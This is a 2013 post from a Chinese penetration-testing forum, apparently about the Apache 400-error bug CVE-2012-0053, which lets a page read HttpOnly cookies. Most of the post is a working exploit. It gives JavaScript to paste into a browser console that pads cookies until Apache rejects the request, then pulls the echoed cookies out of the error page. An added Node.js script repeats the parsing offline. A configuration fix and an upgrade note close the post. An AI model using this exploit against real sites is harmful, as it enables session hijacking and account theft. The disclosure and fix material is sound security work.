中国网络渗透测试联盟
Title: Apache HttpOnly Cookie XSS Vulnerability
Author: admin
Time: 2013-4-19 19:15
Many applications, including commercial and mature open-source CMS/article systems, set the HttpOnly attribute on their cookies to stop XSS from stealing them: a script can no longer read the cookie directly through document.cookie, which lowers the impact of an XSS bug. This Apache issue can be used to get around HttpOnly: when Apache rejects a request with 400 Bad Request because a header field is too large, its default error page echoes the offending header, Cookie included, in the response body, where injected JavaScript can read it.
Open a site in Chrome, press F12 to open the developer tools, switch to the Console, paste the following code and press Enter:
// http://www.exploit-db.com/exploits/18442/

function setCookies (good) {
    // Construct string for cookie value (819 bytes of padding)
    var str = "";
    for (var i=0; i< 819; i++) {
        str += "x";
    }
    // Set ten padding cookies so the Cookie header exceeds Apache's header size limit
    for (i = 0; i < 10; i++) {
        // Expire evil cookie
        if (good) {
            var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
        }
        // Set evil cookie
        else {
            var cookie = "xss"+i+"="+str+";path=/";
        }
        document.cookie = cookie;
    }
}

function makeRequest() {
    setCookies();

    function parseCookies () {
        var cookie_dict = {};
        // Only react on 400 status
        if (xhr.readyState === 4 && xhr.status === 400) {
            // Replace newlines and match <pre> content (Apache echoes the offending header there)
            var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
            if (content && content.length) {
                // Remove Cookie: prefix
                content = content[1].replace("Cookie: ", "");
                // Drop the padding cookies, keep the rest (HttpOnly ones included)
                var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
                // Add cookies to object
                for (var i=0; i<cookies.length; i++) {
                    var s_c = cookies[i].split('=',2);
                    cookie_dict[s_c[0]] = s_c[1];
                }
            }
            // Unset malicious cookies
            setCookies(true);
            alert(JSON.stringify(cookie_dict));
        }
    }

    // Make XHR request
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = parseCookies;
    xhr.open("GET", "/", true);
    xhr.send(null);
}

makeRequest();
You will then see the 400 error page in all its glory, with the cookie information inside it.
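As an added example, not code from the original post or from the exploit-db entry, the following Node.js script shows the two halves of the technique offline: why ten cookies of 819 bytes each push the Cookie header past Apache's default LimitRequestFieldSize of 8190 bytes (an Apache default the post does not state), and how the exploit's parser pulls the real cookies out of the echoed <pre> block. It runs against constructed sample responses: one modelled on the default Apache 2.2 400 page of a vulnerable server, and one from a server configured with the ErrorDocument 400 fix described below. The cookie names PHPSESSID and user, the value abc123 and the host example.com are made-up test data.

```javascript
// Added example (not from the original post or the exploit-db entry):
// the request-size and parsing halves of the technique, runnable in Node.js
// against constructed sample responses instead of a live Apache server.

// Apache's default LimitRequestFieldSize is 8190 bytes per header line.
// The padding cookies push the Cookie header past that, so Apache answers
// 400 Bad Request; on unpatched 2.2.x the default 400 page echoes the
// offending header inside <pre>...</pre>, HttpOnly cookies included.
const APACHE_DEFAULT_LIMIT_REQUEST_FIELD_SIZE = 8190;

// Build the Cookie header the browser would send after the exploit runs:
// the site's own cookies followed by `count` padding cookies xss0..xssN,
// each `padLen` bytes of 'x' (the exploit uses 10 cookies of 819 bytes).
function buildPaddedCookieHeader(existingCookies, count = 10, padLen = 819) {
  const pad = 'x'.repeat(padLen);
  const parts = Object.entries(existingCookies).map(([k, v]) => `${k}=${v}`);
  for (let i = 0; i < count; i++) parts.push(`xss${i}=${pad}`);
  return parts.join('; ');
}

// True when the full header line ("Cookie: " + value) exceeds Apache's limit,
// i.e. when the request will be rejected with 400 Bad Request.
function exceedsFieldSizeLimit(headerValue, limit = APACHE_DEFAULT_LIMIT_REQUEST_FIELD_SIZE) {
  return ('Cookie: ' + headerValue).length > limit;
}

// Parse a response the way the exploit does: only 400 responses count, the
// echoed header is taken from <pre>...</pre>, the "Cookie: " prefix and the
// padding cookies are stripped, and whatever remains is the leaked cookies.
// Returns an empty object when nothing leaked (non-400 status, or a fixed
// server whose custom ErrorDocument no longer echoes the header).
function extractLeakedCookies(status, body) {
  const leaked = {};
  if (status !== 400) return leaked;
  const m = body.replace(/\r|\n/g, '').match(/<pre>(.+)<\/pre>/);
  if (!m) return leaked;                                 // no echoed header
  const content = m[1].replace(/^\s*Cookie:\s*/, '');
  const cookies = content.replace(/xss\d+=x+;?\s*/g, '').split(/;\s*/);
  for (const c of cookies) {
    if (!c) continue;
    const idx = c.indexOf('=');
    if (idx === -1) continue;
    leaked[c.slice(0, idx)] = c.slice(idx + 1);
  }
  return leaked;
}

// Constructed sample: the default Apache 2.2 400 page of a vulnerable server,
// echoing a Cookie header that carries two (possibly HttpOnly) site cookies.
const VULNERABLE_400_BODY = [
  '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">',
  '<html><head>',
  '<title>400 Bad Request</title>',
  '</head><body>',
  '<h1>Bad Request</h1>',
  '<p>Your browser sent a request that this server could not understand.<br />',
  'Size of a request header field exceeds server limit.<br />',
  '<pre>',
  'Cookie: ' + buildPaddedCookieHeader({ PHPSESSID: 'abc123', user: 'admin' }) + '</pre>',
  '</p>',
  '<hr>',
  '<address>Apache/2.2.21 (Unix) Server at example.com Port 80</address>',
  '</body></html>',
].join('\n');

// Constructed sample: the body returned after `ErrorDocument 400 "security test"`
// is configured; the custom message replaces the page that echoed the header.
const FIXED_400_BODY = 'security test';

if (typeof require !== 'undefined' && require.main === module) {
  const header = buildPaddedCookieHeader({ PHPSESSID: 'abc123', user: 'admin' });
  console.log('Cookie header line length:', ('Cookie: ' + header).length,
              'exceeds limit:', exceedsFieldSizeLimit(header));
  console.log('vulnerable server leaks:', extractLeakedCookies(400, VULNERABLE_400_BODY));
  console.log('fixed server leaks:', extractLeakedCookies(400, FIXED_400_BODY));
}
```

Run it with `node` to see the header size that trips the limit, the two cookies recovered from the vulnerable page, and the empty result once the custom ErrorDocument is in place.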
Download:
https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
Fix:
Apache officially provides four ways of handling errors (
http://httpd.apache.org/docs/2.0/mod/core.html#errordocument
), as follows:
In the event of a problem or error, Apache can be configured to do one of four things,
1. output a simple hardcoded error message
2. output a customized message
3. redirect to a local URL-path to handle the problem/error
4. redirect to an external URL to handle the problem/error
In testing, for 400 errors only method 2 is effective: with a customized message the response no longer contains the cookie contents (method 1, the hardcoded default page, is the one that echoes the header).
Apache configuration:

ErrorDocument 400 "security test"
Of course, upgrading Apache to the latest version also fixes it :) (the issue is CVE-2012-0053, fixed in httpd 2.2.22).
Reference:
http://httpd.apache.org/security/vulnerabilities_22.html
Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/)